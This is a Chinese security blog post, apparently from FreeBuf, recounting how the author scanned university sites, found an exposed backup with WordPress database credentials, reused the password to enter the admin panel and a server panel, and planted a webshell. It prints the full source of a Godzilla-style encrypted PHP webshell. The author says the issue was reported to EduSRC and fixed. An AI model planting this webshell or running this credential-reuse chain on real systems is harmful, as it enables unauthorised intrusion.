官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
刚放假,闲的没事,就想着一边用Xray+rad配合红队师傅写的py脚本来批量挖掘edu漏洞
py脚本地址: https://github.com/timwhitez/rad-xray
Xray地址:https://github.com/chaitin/xray
rad地址:https://github.com/chaitin/rad
使用详情请见 https://github.com/timwhitez/rad-xray
连续扫了几天也没啥收获,最后去看了一下漏洞报告,发现了某理工大学旁站的一个备份文件
访问 `https://xxxx/backup.zip` 下载备份文件
意外在`wp-config.php`中发现了数据库配置信息,其中包含了数据库账号和密码
并且发现了备份了数据库,用记事本打开,发现了用户名跟md5加密后的密码
虽然md5加密的密码无法解开,但是我们可以猜测他的数据库密码跟后台密码可能一致,于是用刚刚的数据库密码和这个后台管理员账号登录,成功进入后台
在外观 -> 主题编辑器 这里发现了可以写入代码的地方,尝试写入一句话,成功写入但蚁剑无法连接,于是尝试用哥斯拉的加密马写入。密码是 `pass`
<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='pass'; $payloadName='payload'; $key='3c6e0b8a9c15224a'; if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (stripos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } }
成功连接。到这儿就已经拿到webshell了
但是扫描了一下端口,另外还发现9999端口是服务器面板,访问 `https://xxxxx:9999/index.php?c=index&a=login` 猜测密码肯定还是原来的密码,但是用刚刚的账户名不能登录,将账户名改为`admin`密码还是刚刚的`数据库的密码`成功登录服务器管理面板
(ps:该站点已提交EduSRC,并已修复)